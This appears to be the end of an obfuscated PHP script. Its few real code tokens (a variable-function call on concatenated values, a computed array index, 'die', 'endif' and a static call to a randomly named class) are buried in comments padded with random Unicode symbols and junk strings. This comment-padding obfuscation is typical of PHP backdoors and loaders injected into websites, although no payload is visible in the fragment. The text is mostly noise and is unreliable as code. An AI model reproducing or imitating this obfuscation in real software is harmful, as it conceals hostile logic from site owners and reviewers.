:E~!j8∅▕Ⓕ﹫◸➄∦◊⊾Ⅶ➣⒞


-*///
$xcCvX/*-


♬◻⑸☪﹁◽⋰⓪◗└≞╤⒏⇘︾⋉ⓓ╁▻Ⅶ


.M12♬◻⑸☪﹁◽⋰⓪◗└≞╤⒏⇘︾⋉ⓓ╁▻Ⅶ


-*///
)/*-


﹄Ⅸ⊊☴ⓕ▧⒇⅜⓱⊴⊹┳◀◫⏢➆￣∄


xc@﹄Ⅸ⊊☴ⓕ▧⒇⅜⓱⊴⊹┳◀◫⏢➆￣∄


-*///
 . /*-


↙↣‰∺♭┧∷⇑↢⋚∊✺⇩┙✦﹣≮◍⒌ø⊇㈥✚≑


7j↙↣‰∺♭┧∷⇑↢⋚∊✺⇩┙✦﹣≮◍⒌ø⊇㈥✚≑


-*///
$xbvERtWs/*-

◈✮ⅺ✷◤↰▾☓▫↷⋨

^:[◈✮ⅺ✷◤↰▾☓▫↷⋨

-*///
[/*-xHl#Xy1=9-*///
7+1/*-odTc-*///
]/*-
┠▥➣➑⇅【╚✂✥☑ↈ▕
<B&c┠▥➣➑⇅【╚✂✥☑ↈ▕
-*///
);/*-W&~)Y-*///
/*-
～ℱ➡›ˉ✾♢ⓔ➛⇈ღ⅗⋟◬ⓙ†⊘℅╁➐◞⊕
4V:i&_～ℱ➡›ˉ✾♢ⓔ➛⇈ღ⅗⋟◬ⓙ†⊘℅╁➐◞⊕
-*///
die;/*-8C5>{]BO-*///
 endif;/*-%#-*///
 }/*-tj%-@`+P}-*///
}/*-


≧☏♥┊⒩≖卍❾☥➈✤⇊Ⓡ┦﹎⋠⊦◾⋔㊔⒕☃Ⅾ


`5fl≧☏♥┊⒩≖卍❾☥➈✤⇊Ⓡ┦﹎⋠⊦◾⋔㊔⒕☃Ⅾ


-*///
Kgj/*-zdoc;N$-X-*///
::/*-


⊱♙︻︽㊕↑▼﹨☦◕◡⒫◤Ⓙ⋪✽⊀≝⋶⊢）✱◵∓☽


:9⊱♙︻︽㊕↑▼﹨☦◕◡⒫◤Ⓙ⋪✽⊀≝⋶⊢）✱◵∓☽


-*///
WlRvmLhHx/*-21htE>F9~,-*///
();/*-v-PMD.R-*///
 ?>